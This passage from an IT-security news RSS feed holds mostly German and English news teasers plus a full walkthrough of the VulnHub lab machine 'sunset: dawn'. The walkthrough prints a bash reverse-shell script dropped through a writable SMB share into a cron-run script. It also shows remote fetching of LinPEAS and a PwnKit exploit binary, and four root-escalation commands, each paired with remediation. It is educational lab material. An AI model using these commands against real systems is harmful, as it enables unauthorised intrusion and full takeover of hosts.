<description><![CDATA[Microsoft Entra ID (Azure Active Directory): virtueller Ein-Tages-Workshop. Seminar · IT Sicherheitstests und Ethical Hacking mit Kali Linux (E- ...]]></description>
<link>https://tsecurity.de/de/3620093/it-security-nachrichten/valve-die-steam-machine-muss-kein-bestseller-werden-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620093/it-security-nachrichten/valve-die-steam-machine-muss-kein-bestseller-werden-golemde/</guid>
<pubDate>Wed, 24 Jun 2026 04:52:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft Entra ID (Azure Active Directory): virtueller Ein-Tages-Workshop. Seminar · <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Deep Mind kooperiert mit dem schrägen Filmstudio A24]]></title>
<description><![CDATA[Das Filmstudio A24 ist den Cineasten unter den Lesern sicherlich ein Begriff. Oft stemmt der Vertrieb eigenwillige Produktionen wie „Everything Everywhere All at Once“, „Der Leuchtturm“ oder auch den aktuellen Gassenhauer „Backrooms“. Inzwischen hat A24 gemeinsam mit Google Deep Mind...Zum Beitra...]]></description>
<link>https://tsecurity.de/de/3619212/it-nachrichten/google-deep-mind-kooperiert-mit-dem-schraegen-filmstudio-a24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619212/it-nachrichten/google-deep-mind-kooperiert-mit-dem-schraegen-filmstudio-a24/</guid>
<pubDate>Tue, 23 Jun 2026 19:48:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Filmstudio A24 ist den Cineasten unter den Lesern sicherlich ein Begriff. Oft stemmt der Vertrieb eigenwillige Produktionen wie „Everything Everywhere All at Once“, „Der Leuchtturm“ oder auch den aktuellen Gassenhauer „Backrooms“. Inzwischen hat A24 gemeinsam mit Google Deep Mind...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/google-deep-mind-kooperiert-mit-dem-schraegen-filmstudio-a24/">Google Deep Mind kooperiert mit dem schrägen Filmstudio A24</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security Teams Must Become Engineers]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:39 Security teams are becoming deeply technical because modern infrastructure complexity keeps increasing. In this clip, Ev explains why many organizations are restructuring cybersecurity around engineering instead of traditional IT...]]></description>
<link>https://tsecurity.de/de/3618637/it-security-video/security-teams-must-become-engineers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618637/it-security-video/security-teams-must-become-engineers/</guid>
<pubDate>Tue, 23 Jun 2026 16:33:54 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:39 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/qbOjRwbu_dk?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Security teams are becoming deeply technical because modern infrastructure complexity keeps increasing. In this clip, Ev explains why many organizations are restructuring cybersecurity around engineering instead of traditional IT operations.<br />
<br />
This changes more than job titles. Some companies are embedding security into platform engineering teams, while others are hiring more engineers directly into security roles. The larger issue is organizational lag: human systems and org charts evolve slower than infrastructure itself.<br />
<br />
As cloud platforms, identity systems, and automation become harder to manage, companies may struggle if security teams aren’t built to operate at an engineering level.<br />
<br />
Does cybersecurity eventually become an engineering discipline everywhere — or will some organizations keep treating it as a support function?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#Engineering #CloudSecurity #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bildung: Norwegen verbietet KI-Tools an Grundschulen - Golem.de]]></title>
<description><![CDATA[IT-Security-Awareness für Systemadministratoren: virtueller Ein-Tages-Workshop. Seminar · IT Sicherheitstests und Ethical Hacking mit Kali Linux (E- ...]]></description>
<link>https://tsecurity.de/de/3617394/it-security-nachrichten/bildung-norwegen-verbietet-ki-tools-an-grundschulen-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617394/it-security-nachrichten/bildung-norwegen-verbietet-ki-tools-an-grundschulen-golemde/</guid>
<pubDate>Tue, 23 Jun 2026 08:52:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>IT</b>-<b>Security</b>-Awareness für Systemadministratoren: virtueller Ein-Tages-Workshop. Seminar · IT Sicherheitstests und Ethical Hacking mit Kali Linux (E- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Wenn die App der Chef ist: EU dreht Beweislast gegen Uber und Lieferando - Golem.de]]></title>
<description><![CDATA[... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) · zum Kurs. IT-Security ... IT-Security-Awareness für Systemadministratoren ...]]></description>
<link>https://tsecurity.de/de/3615835/it-security-nachrichten/wenn-die-app-der-chef-ist-eu-dreht-beweislast-gegen-uber-und-lieferando-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615835/it-security-nachrichten/wenn-die-app-der-chef-ist-eu-dreht-beweislast-gegen-uber-und-lieferando-golemde/</guid>
<pubDate>Mon, 22 Jun 2026 16:55:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) · zum Kurs. <b>IT</b>-<b>Security</b> ... <b>IT</b>-<b>Security</b>-Awareness für Systemadministratoren ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Webshells Remain Popular, (Mon, Jun 22nd)]]></title>
<description><![CDATA[Webshells have been popular for a long time. We already covered this topic across multiple diaries[1][2]. I spent some time to track them[3] and slighly paid less attention to them but today I found another one. It seems to be a new player (pushed on Github two months ago).]]></description>
<link>https://tsecurity.de/de/3615752/it-security-nachrichten/webshells-remain-popular-mon-jun-22nd/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615752/it-security-nachrichten/webshells-remain-popular-mon-jun-22nd/</guid>
<pubDate>Mon, 22 Jun 2026 16:22:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Webshells have been popular for a long time. We already covered this topic across multiple diaries[<a href="https://isc.sans.edu/diary/Webshells+Webshells+everywhere/28106">1</a>][<a href="https://isc.sans.edu/diary/Webshell+looking+for+interesting+files/23567">2</a>]. I spent some time to track them[<a href="https://owasp.org/www-chapter-belgium/assets/2017/2017-05-29/2017-05-29_OWASP-BE_HTTPForTheGoodOrTheBad.pdf">3</a>] and slighly paid less attention to them but today I found another one. It seems to be a new player (pushed on Github two months ago). </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Miasma Worm Source Code Leaked + What NPM v12 Means for Developers | Threat Wire]]></title>
<description><![CDATA[Author: Hak5 - Bewertung: 15x - Views:67 This week on ThreatWire, we look into the evolving landscape of software supplychain attacks. We analyze the leaked Miasma worm toolkit and its use of GitHub as a C2 server, discuss the security implications of NPM v12 disabling install-time lifecycle scri...]]></description>
<link>https://tsecurity.de/de/3615747/it-security-video/miasma-worm-source-code-leaked-what-npm-v12-means-for-developers-threat-wire/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615747/it-security-video/miasma-worm-source-code-leaked-what-npm-v12-means-for-developers-threat-wire/</guid>
<pubDate>Mon, 22 Jun 2026 16:18:29 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Hak5 - Bewertung: 15x - Views:67 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/zd6_1LmD79Y?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>This week on ThreatWire, we look into the evolving landscape of software supplychain attacks. We analyze the leaked Miasma worm toolkit and its use of GitHub as a C2 server, discuss the security implications of NPM v12 disabling install-time lifecycle scripts, and look at the U.S. government’s directive that led Anthropic to disable access to its Fable/Mythos models. Plus, a rapid-fire rundown of the latest BSides news.<br />
<br />
⬇️ OPEN FOR LINKS TO ARTICLES TO LEARN MORE ⬇️<br />
<br />
<br />
<br />
@endingwithali →<br />
Twitch: https://twitch.tv/endingwithali<br />
Twitter: https://twitter.com/endingwithali<br />
YouTube: https://youtube.com/@endingwithali<br />
Everywhere else: https://links.ali.dev<br />
<br />
Want to work with Ali? hak5@endingwithali.com<br />
<br />
[❗] Join the Patreon→ https://patreon.com/threatwire<br />
0:00 0 - Intro<br />
1 - Microsoft Miasma Updates<br />
2 - NPM Makes Changes<br />
3 - Shark Jack Display!<br />
4 - Anthropic Called Mythos Bluff<br />
5 - BSides News<br />
6 - Outro<br />
<br />
LINKS<br />
🔗 Story 1: Microsoft Miasma Updates<br />
https://github.blog/news-insights/company-news/npm-is-joining-github/<br />
https://thehackernews.com/2026/06/microsoft-restores-some-github-repos.html<br />
https://www.bleepingcomputer.com/news/security/the-miasma-worm-source-code-briefly-leaked-on-github/<br />
https://safedep.io/inside-the-miasma-supply-chain-attack-toolkit/<br />
🔗 Story 2: NPM Makes Changes<br />
https://thehackernews.com/2026/06/github-to-disable-npm-install-scripts.html<br />
https://github.blog/changelog/2026-06-09-upcoming-breaking-changes-for-npm-v12/<br />
https://www.aikido.dev/blog/npm-v12-block-postinstall<br />
https://medium.com/@v_pragma/12-strange-things-that-can-happen-after-installing-an-npm-package-45de7fbf39f0<br />
🔗 Story 3:  Anthropic Called Mythos Bluff<br />
https://www.bleepingcomputer.com/news/security/us-gov-asks-anthropic-to-ban-foreign-national-access-to-fable-mythos/<br />
https://www.anthropic.com/news/claude-fable-5-mythos-5<br />
https://www.anthropic.com/news/fable-mythos-access<br />
https://techcrunch.com/2026/06/10/cybersecurity-researchers-arent-happy-about-the-guardrails-on-anthropics-fable/<br />
🔗 Story 4: BSides News<br />
https://www.cbc.ca/news/canada/social-media-ban-bill-teens-parents-reax-9.7232286<br />
https://deadeclipse666.blogspot.com/<br />
https://about.fb.com/news/2026/06/fighting-spyware-an-update-from-whatsapp/<br />
https://www.bleepingcomputer.com/news/security/over-400-arch-linux-packages-compromised-to-push-rootkit-infostealer/<br />
https://hackread.com/atomic-arch-hijacks-linux-aur-packages-malware/<br />
https://www.tomshardware.com/software/linux/california-moves-to-exempt-linux-from-its-upcoming-age-verification-law-after-backlash-over-forcing-operating-systems-to-collect-users-ages-amendment-proposed-by-the-same-lawmaker-who-wrote-the-original-law<br />
-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆<br />
Our Site → https://www.hak5.org<br />
Shop →  http://hakshop.myshopify.com/<br />
Community → https://www.hak5.org/community<br />
Subscribe → https://www.youtube.com/user/Hak5Darren?sub_confirmation=1<br />
Support → https://www.patreon.com/threatwire<br />
Contact Us → http://www.twitter.com/hak5<br />
____________________________________________<br />
<br />
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community – where all hackers belong.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Grafikkarte: Scammer verkaufen Geforce RTX 4090 mit Plastikteilen - Golem.de]]></title>
<description><![CDATA[Seminar: IT-Sicherheit für Webentwickler: virtueller Zwei-Tage-Workshop · zum Kurs. IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ...]]></description>
<link>https://tsecurity.de/de/3613813/it-security-nachrichten/grafikkarte-scammer-verkaufen-geforce-rtx-4090-mit-plastikteilen-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613813/it-security-nachrichten/grafikkarte-scammer-verkaufen-geforce-rtx-4090-mit-plastikteilen-golemde/</guid>
<pubDate>Sun, 21 Jun 2026 17:52:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seminar: <b>IT</b>-<b>Sicherheit</b> für Webentwickler: virtueller Zwei-Tage-Workshop · zum Kurs. IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Jailbreak möglich: Wohl unpatchbarer Hardware-Bug gefährdet iPhones - Golem.de]]></title>
<description><![CDATA[Seminar: IT-Security-Awareness für Systemadministratoren: virtueller Ein-Tages-Workshop · zum Kurs. IT Sicherheitstests und Ethical Hacking mit Kali ...]]></description>
<link>https://tsecurity.de/de/3611228/it-security-nachrichten/jailbreak-moeglich-wohl-unpatchbarer-hardware-bug-gefaehrdet-iphones-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611228/it-security-nachrichten/jailbreak-moeglich-wohl-unpatchbarer-hardware-bug-gefaehrdet-iphones-golemde/</guid>
<pubDate>Fri, 19 Jun 2026 21:52:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seminar: <b>IT</b>-<b>Security</b>-Awareness für Systemadministratoren: virtueller Ein-Tages-Workshop · zum Kurs. IT Sicherheitstests und Ethical Hacking mit Kali ...]]></content:encoded>
</item>
<item>
<title><![CDATA[VulnHub — sunset: dawn | Full Walkthrough]]></title>
<description><![CDATA[Author: Shikhali Jamalzade GitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzads Platform: VulnHub Machine: sunset: dawn by @whitecr0wz Difficulty: Beginner–Intermediate | OS: Debian GNU/Linux 10 (Buster)Overviewsunset: dawn is a beginner-to-intermediate VulnHub machine and the second ...]]></description>
<link>https://tsecurity.de/de/3610158/hacking/vulnhub-sunset-dawn-full-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610158/hacking/vulnhub-sunset-dawn-full-walkthrough/</guid>
<pubDate>Fri, 19 Jun 2026 13:09:29 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DmUHvH2bRCpfgOTUO1ojqQ.png"></figure><p><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a> <br><strong>GitHub:</strong> <a href="http://github.com/alisalive">github.com/alisalive</a> <br><strong>LinkedIn:</strong> <a href="http://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a> <br><strong>Platform:</strong> <a href="http://vulnhub.com/">VulnHub</a> <br><strong>Machine:</strong> <a href="https://www.vulnhub.com/entry/sunset-dawn,341/">sunset: dawn</a> by @whitecr0wz <br><strong>Difficulty:</strong> Beginner–Intermediate | <strong>OS:</strong> Debian GNU/Linux 10 (Buster)</p><h3>Overview</h3><p>sunset: dawn is a beginner-to-intermediate VulnHub machine and the second entry in the sunset series by @whitecr0wz. The attack path begins with SMB enumeration that reveals a writable share mapped directly to a directory executed by a root-owned cron job — uploading a reverse shell script there is enough to land a www-data shell. Post-exploitation enumeration with LinPEAS then uncovers four independent privilege escalation paths, each sufficient on its own to reach root. This machine is an excellent exercise in SMB misconfigurations, cron-based exploitation, and Linux post-exploitation methodology.</p><p><strong>Flag captured:</strong></p><ul><li>flag.txt → /root/flag.txt</li></ul><h3>Environment</h3><p>Parameter Value Target IP 192.168.100.198 Attacker IP 192.168.100.199 (Kali Linux) Test Type Black Box Hostname dawn</p><h3>Reconnaissance</h3><h3>Network Scan — Nmap</h3><p>Full-port aggressive scan to enumerate all open services:</p><pre>nmap -p- -sV -sC 192.168.100.198</pre><p><strong>Results:</strong></p><pre>PORT     STATE SERVICE     VERSION<br>80/tcp   open  http        Apache httpd 2.4.38 ((Debian))<br>139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)<br>445/tcp  open  microsoft-ds Samba smbd 4.9.5-Debian<br>3306/tcp open  mysql       MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1</pre><pre>Host script results:<br>| smb-os-discovery:<br>|   OS: Windows 6.1 (Samba 4.9.5-Debian)<br>|   Computer name: dawn<br>|   NetBIOS computer name: DAWN<br>|_  Domain name: dawn</pre><p><strong>Key observations:</strong></p><ul><li><strong>Port 80</strong> — Apache 2.4.38: web server present, but browsing to it yields no useful content</li><li><strong>Port 139/445</strong> — Samba SMB: the most interesting attack surface given no web application</li><li><strong>Port 3306</strong> — MariaDB: MySQL listening, but almost certainly bound to localhost only</li></ul><p>With the web server returning nothing useful, SMB becomes the primary focus.</p><h3>Web Enumeration — Gobuster</h3><p>Even though the web server returned no meaningful content at the root, I ran a directory scan in parallel:</p><pre>gobuster dir -u http://192.168.100.198 \<br>  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \<br>  -x php,txt,html</pre><p><strong>Results:</strong></p><pre>/logs   (Status: 301)</pre><p>Browsing to /logs/ revealed a file: management.log. This log turned out to be critical — it recorded cron job activity on the system, showing automated execution of scripts inside a directory called ITDEPT:</p><pre>Executing /home/dawn/ITDEPT/product-control<br>Executing /home/dawn/ITDEPT/web-control<br>chmod +x /home/dawn/ITDEPT/product-control<br>chmod +x /home/dawn/ITDEPT/web-control<br>sh /home/dawn/ITDEPT/product-control<br>sh /home/dawn/ITDEPT/web-control</pre><p>The system was automatically making files executable and running them every minute. The name ITDEPT matched exactly what I was about to find in the SMB shares.</p><h3>SMB Enumeration — enum4linux</h3><pre>enum4linux -a 192.168.100.198</pre><p><strong>Results:</strong></p><pre>Sharename    Type    Comment<br>---------    ----    -------<br>print$       Disk    Printer Drivers<br>ITDEPT       Disk    PLEASE DO NOT REMOVE THIS SHARE.<br>                     IN CASE YOU ARE NOT AUTHORIZED TO USE<br>                     THIS SYSTEM LEAVE IMMEDIATELY.<br>IPC$         IPC     IPC Service (Samba 4.9.5-Debian)</pre><pre>[+] Users found via RID cycling:<br>    dawn<br>    ganimedes</pre><p>Two findings that matter:</p><ul><li>The ITDEPT share exists and carries a warning message — a clear sign it is actively monitored or executed</li><li>Two system users identified: <strong>dawn</strong> and <strong>ganimedes</strong></li></ul><p>I verified access permissions with smbmap:</p><pre>smbmap -H 192.168.100.198</pre><pre>ITDEPT    READ, WRITE    PLEASE DO NOT REMOVE THIS SHARE...</pre><p><strong>READ and WRITE access — no authentication required.</strong> Combined with what management.log already told me — that the system executes scripts from this exact directory every minute — the attack path was clear.</p><h3>Initial Access — SMB Write + Cron Execution → Reverse Shell</h3><p>Detail Value Vector SMB writable share + root cron job Shell obtained www-data Severity <strong>Critical</strong></p><p>The cron job runs sh /home/dawn/ITDEPT/web-control every minute. The ITDEPT SMB share maps directly to /home/dawn/ITDEPT/. Anyone who can write to the share can write to that path — and the cron will execute whatever they put there as the service account.</p><p><strong>Step 1 — Create the reverse shell script locally:</strong></p><pre>cat &gt; web-control &lt;&lt; 'EOF'<br>#!/bin/bash<br>bash -i &gt;&amp; /dev/tcp/192.168.100.199/4444 0&gt;&amp;1<br>EOF</pre><p><strong>Step 2 — Start a listener on Kali:</strong></p><pre>nc -lvnp 4444</pre><p><strong>Step 3 — Upload the script to the ITDEPT share:</strong></p><pre>smbclient //192.168.100.198/ITDEPT -N<br>smb: \&gt; put web-control<br>putting file web-control as \web-control (6.8 kb/s)<br>smb: \&gt; exit</pre><p><strong>Step 4 — Wait for the cron to fire (up to 60 seconds):</strong></p><pre>Connection received on 192.168.100.198 54321<br>www-data@dawn:/home/dawn/ITDEPT$</pre><p>Shell obtained as www-data. I stabilised it immediately:</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'<br># Ctrl+Z<br>stty raw -echo; fg<br>export TERM=xterm</pre><h3>Post-Exploitation Enumeration — LinPEAS</h3><p>With a stable shell, I transferred LinPEAS to the target using a Python HTTP server:</p><p><strong>On Kali:</strong></p><pre>cd /usr/share/peass/linpeas<br>python3 -m http.server 80</pre><p><strong>On the target:</strong></p><pre>cd /tmp<br>wget http://192.168.100.199/linpeas.sh<br>chmod +x linpeas.sh<br>./linpeas.sh</pre><p>LinPEAS immediately flagged four high-severity findings — each one a standalone path to root.</p><h3>Privilege Escalation</h3><h3>Vector 1 — Sudo Misconfiguration</h3><p>Detail Value Finding www-data can run /usr/bin/sudo as root with no password Severity <strong>Critical</strong></p><p>LinPEAS output:</p><pre>User www-data may run the following commands on dawn:<br>    (root) NOPASSWD: /usr/bin/sudo</pre><p>This configuration allows www-data to run the sudo binary itself as root — without any password. Invoking sudo from inside sudo spawns a second privileged process that drops directly into a root shell.</p><p><strong>Exploitation:</strong></p><pre>www-data@dawn:/tmp$ sudo sudo /bin/bash<br>root@dawn:/tmp# id<br>uid=0(root) gid=0(root) groups=0(root)</pre><p>One command. Full root.</p><p><strong>Remediation:</strong></p><p>Edit /etc/sudoers and remove the www-data entry entirely. If www-data genuinely needs elevated access for a specific task, scope it to the minimum required binary — never to sudo itself:</p><pre># Remove this line:<br>www-data ALL=(root) NOPASSWD: /usr/bin/sudo</pre><h3>Vector 2 — SUID Binary (zsh)</h3><p>Detail Value Finding /usr/bin/zsh has the SUID bit set, owned by root Severity <strong>Critical</strong></p><p>LinPEAS output:</p><pre>-rwsr-xr-x 1 root root 842K Feb 4 2019 /usr/bin/zsh</pre><p>When the SUID bit is set on a binary, the process runs with the file owner’s privileges regardless of who launches it. Since zsh is a fully functional interactive shell owned by root, executing it directly spawns a root shell.</p><p><strong>Exploitation:</strong></p><pre>www-data@dawn:/tmp$ /usr/bin/zsh<br>dawn# whoami<br>root<br>dawn# id<br>uid=0(root) gid=0(root) groups=0(root)</pre><p><strong>Remediation:</strong></p><p>Remove the SUID bit from zsh immediately:</p><pre>chmod u-s /usr/bin/zsh</pre><pre># Verify:<br>ls -la /usr/bin/zsh<br>-rwxr-xr-x 1 root root 842K /usr/bin/zsh</pre><p>Interactive shells (bash, zsh, sh, dash) must never carry the SUID bit. Audit all SUID binaries regularly:</p><pre>find / -perm -4000 -type f 2&gt;/dev/null</pre><h3>Vector 3 — Writable Cron Script</h3><p>Detail Value Finding Root cron executes a script world-writable by www-data Severity <strong>High</strong></p><p>LinPEAS identified two things in combination:</p><p><strong>Finding 1 — root crontab:</strong></p><pre>* * * * * /home/dawn/ITDEPT/web-control</pre><p><strong>Finding 2 — permissions on that script:</strong></p><pre>-rwxrwxrwx 1 dawn dawn /home/dawn/ITDEPT/web-control</pre><p>The script is world-writable. Root executes it every minute. Any user who can write to this file can inject arbitrary commands that root will run.</p><p><strong>Exploitation:</strong></p><pre># Inject a SUID bash copy into the script<br>echo 'cp /bin/bash /tmp/rootbash &amp;&amp; chmod +s /tmp/rootbash' &gt;&gt; \<br>  /home/dawn/ITDEPT/web-control</pre><pre># Wait up to 60 seconds for the cron to fire, then:<br>/tmp/rootbash -p</pre><pre>rootbash-5.0# whoami<br>root<br>rootbash-5.0# id<br>uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root)</pre><p><strong>Remediation:</strong></p><pre>chmod 700 /home/dawn/ITDEPT/web-control<br>chown root:root /home/dawn/ITDEPT/web-control</pre><p>Any script executed by a root cron job must be owned by root and writable only by root. Audit cron scripts regularly:</p><pre>find /etc/cron* /var/spool/cron -type f | xargs ls -la</pre><h3>Vector 4 — PwnKit (CVE-2021–4034)</h3><p>Detail Value CVE CVE-2021–4034 CVSS 7.8 (High) Component pkexec (Polkit) Vulnerable version pkexec 0.105 Exploit source github.com/ly4k/PwnKit Severity <strong>Critical</strong></p><p>LinPEAS flagged this in its Exploit Suggester output:</p><pre>[+] [CVE-2021-4034] PwnKit<br>    Tags: [ debian=7|8|9|10|11 ]<br>    Exposure: probable</pre><p>PwnKit is a heap-based memory corruption vulnerability in pkexec — the PolicyKit binary present on virtually every Linux distribution. The flaw has existed since 2009 and was disclosed by Qualys Research Team in January 2022. It allows any unprivileged local user to escalate to root.</p><p>The pkexec binary on this system was confirmed vulnerable:</p><pre>-rwsr-xr-x 1 root root 23288 Jan 15 2019 /usr/bin/pkexec</pre><p><strong>Exploitation:</strong></p><p>On Kali, I downloaded the pre-compiled binary from ly4k/PwnKit and served it via HTTP:</p><pre>wget https://github.com/ly4k/PwnKit/raw/main/PwnKit<br>python3 -m http.server 80</pre><blockquote><strong><em>Note:</em></strong><em> The first attempt using berdav/CVE-2021–4034 failed with a </em><em>GLIBC_2.34 version mismatch. The </em><em>ly4k/PwnKit pre-compiled binary targets older GLIBC versions and is the correct choice for Debian 10.</em></blockquote><p>On the target:</p><pre>cd /tmp<br>wget http://192.168.100.199/PwnKit<br>chmod +x PwnKit<br>./PwnKit</pre><pre>root@dawn:/tmp# whoami<br>root<br>root@dawn:/tmp# id<br>uid=0(root) gid=0(root) groups=0(root),33(www-data)</pre><p><strong>Remediation:</strong></p><pre># Update polkit immediately:<br>sudo apt update &amp;&amp; sudo apt upgrade policykit-1</pre><pre># If updating is not immediately possible, remove the SUID bit as a temporary measure<br># (note: this may break some GUI authentication prompts):<br>chmod 0755 /usr/bin/pkexec</pre><p>The patched version for Debian 10 is policykit-1 0.105-26+deb10u1 or later.</p><h3>Root Flag</h3><pre>root@dawn:~# cat /root/flag.txt</pre><pre>Hello! whitecr0wz here. I hope you enjoyed this box, if you<br>did please let me know at Twitter @whitecr0wz!</pre><pre>flag{3a3e52f0a6af0d6e36d7c5027c87f6e1}</pre><h3>Full Attack Chain</h3><pre>[Kali — 192.168.100.199]<br>         |<br>         | nmap -p- -sV -sC<br>         ↓<br>[dawn — 192.168.100.198]<br>  Port 80  → Apache 2.4.38 (no content)<br>  Port 445 → Samba (ITDEPT share)<br>         |<br>         | gobuster → /logs/management.log<br>         ↓<br>  Log reveals: cron executes ITDEPT/web-control every minute<br>         |<br>         | enum4linux → ITDEPT share: READ + WRITE (no auth)<br>         ↓<br>  Upload reverse shell as web-control → cron fires → www-data shell<br>         |<br>         | wget linpeas.sh → ./linpeas.sh<br>         ↓<br>  4 privesc vectors found:<br>    [1] sudo sudo /bin/bash           → root (1 command)<br>    [2] /usr/bin/zsh (SUID)           → root (1 command)<br>    [3] echo into web-control cron    → root (wait 60s)<br>    [4] ./PwnKit (CVE-2021-4034)      → root (1 command)<br>         |<br>         ↓<br>  ROOT — uid=0 — FULL COMPROMISE ✓</pre><h3>Key Takeaways</h3><p><strong>Reading logs before attacking:</strong> The /logs/management.log file told me exactly what the system was doing before I sent a single offensive request. Logs, readme files, and error messages often contain more actionable intelligence than any scanner output. Always enumerate web content thoroughly even when the homepage appears empty.</p><p><strong>The SMB + cron combination:</strong> Neither the writable SMB share nor the cron job is catastrophic in isolation. Together they form a trivially exploitable initial access path — no credentials, no CVE, no brute force required. This is a textbook example of how misconfigured services compound each other.</p><p><strong>Four paths, one machine:</strong> Finding four independent privilege escalation routes on a single system underscores an important principle: each vulnerability does not need to be critical on its own. Sudo misconfiguration, a SUID shell binary, a world-writable cron script, and an unpatched kernel component all coexisted here. Defence-in-depth means fixing all of them, not just the most obvious one.</p><p><strong>GLIBC compatibility matters:</strong> The first PwnKit attempt failed due to a version mismatch between the compiled exploit binary and the target’s C library. When a kernel/userspace exploit fails silently, always check the GLIBC version (ldd --version) and match the pre-compiled exploit accordingly before assuming the system is not vulnerable.</p><p><em>Shikhali Jamalzade — alisalive.exe — instagram<br></em> <em>GitHub: </em><a href="https://github.com/alisalive"><em>github.com/alisalive</em></a><em> · LinkedIn: </em><a href="https://linkedin.com/in/camalzads"><em>linkedin.com/in/camalzads</em></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=db12d38d2e3b" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/vulnhub-sunset-dawn-full-walkthrough-db12d38d2e3b">VulnHub — sunset: dawn | Full Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Riesige Angriffswelle: Hacker knacken Admin-Passwörter von 74.000 Firewalls - Golem.de]]></title>
<description><![CDATA[E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ... Hudson Rock listet in seinem Bericht jeweils die 30 am stärksten ...]]></description>
<link>https://tsecurity.de/de/3609031/hacking/riesige-angriffswelle-hacker-knacken-admin-passwoerter-von-74000-firewalls-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609031/hacking/riesige-angriffswelle-hacker-knacken-admin-passwoerter-von-74000-firewalls-golemde/</guid>
<pubDate>Fri, 19 Jun 2026 00:19:58 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
